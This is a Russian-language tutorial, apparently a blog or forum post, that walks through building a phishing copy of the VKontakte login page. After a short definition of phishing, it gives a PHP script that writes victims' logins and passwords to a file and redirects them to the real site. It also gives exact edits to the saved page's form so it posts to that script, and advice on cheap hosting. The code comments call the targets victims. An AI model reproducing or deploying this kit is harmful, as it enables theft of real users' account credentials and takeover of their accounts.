Фишинг вконтакте
Shandarabas GundarabaЧто такое фишинг?
Вообще слово fishing переводится как рыбалка. Фишинг — это подмена какого-либо сайта, на котором пользователи вводят учетные данные, такие как «логин» и «пароль», после чего перенаправляются на официальный сайт, чтобы не было подозрений. А нехороший человек «редиска» узнает ваши учетные данные, и может входить под вашим логином на сайт.
Приведу пример создания фишингового сайта для социальной сети вконтакте.
Заходим по адресу vk.com,
жмем файл => сохранить как =>
Имя файла: index.html
Тип файла: Веб – страница, полностью с картинками. Жмем кнопку, Сохранить.
Теперь нужно создать скрипт, который будет передавать данные введенные в поле логин и пароль. Назовем его icq.php
Открываем блокнот и вставляем туда этот код.
<?
$Login = $_POST[zabor]; // Логин жертвы
$Pass = $_POST[‘zena’]; // Пароль жертвы
$log = fopen(«ups.php»,»a+»); //тут будут лежать пароли жертв
fwrite($log,»<br> $Login:$Pass \n»); //производим запись в ups.php
fclose($log); //закрывает ups.php
echo «<html><head><META HTTP-EQUIV=’Refresh’ content =’0; URL=http://vkontakte.ru’></head></html>»; // перенаправляем жертву на http://vk.com
?>
Закрываем и сохраняем как icq.php
Открываем в блокноте файл, index.html. Открываем поиск (ctrl+f) и вводим <form жмем enter.
Он найдет строчку:
<FORM name=»login» id=»quick_login_form» onsubmit=»if (vklogin) {return true} else {quick_login();return false;}» action=»https://login.vk.com/?act=login» method=»POST»>
Меняем её на это:
<FORM name=»login» id=»quick_login_form» onsubmit=»if (vklogin) {return true} else {quick_login();return false;}» action=»icq.php» method=»POST»>
Дальше, смотрим чуть ниже и находим строчку:
<INPUT name=»email» id=»quick_email» onfocus=»show’quick_expire’)» type=»text»>
Меняем на это:
<INPUT name=»zabor» id=»quick_email» onfocus=»show(‘quick_expire’)»type=»text»>
Смотрим еще чуть ниже и находим строчку:
<INPUT name=»pass» id=»quick_pass» onfocus=»show(‘quick_expire’)»type=»password»>
Меняем на это:
<INPUT name=»zena» id=»quick_pass» onfocus=»show(‘quick_expire’)»type=»password»>
Дальше необходимо кнопку «Войти» включить в форму, чтобы она работала, для этого, находим чуть ниже закрывающийся тег </form>, вырезаем его и вставляем его вот тут.
<DIV class=»button_blue button_wide»><BUTTON id=»quick_login_button»>Войти</BUTTON></form></DIV>
Сохраняем index.html, и у вас в итоге получилось два файла файла и одна папка. Дальше все это дело нужно будет залить на ваш хостинг. Вот этим https://beget.com можно месяц бесплатно пользоваться, можно купить на месяц, всего 150 рублей.
Когда жертва заходит на фишинговую страничку, вводит «логин» и «пароль», у вас создатся на хостинге еще один файл, ups.php в нем и будут храниться учетные записи.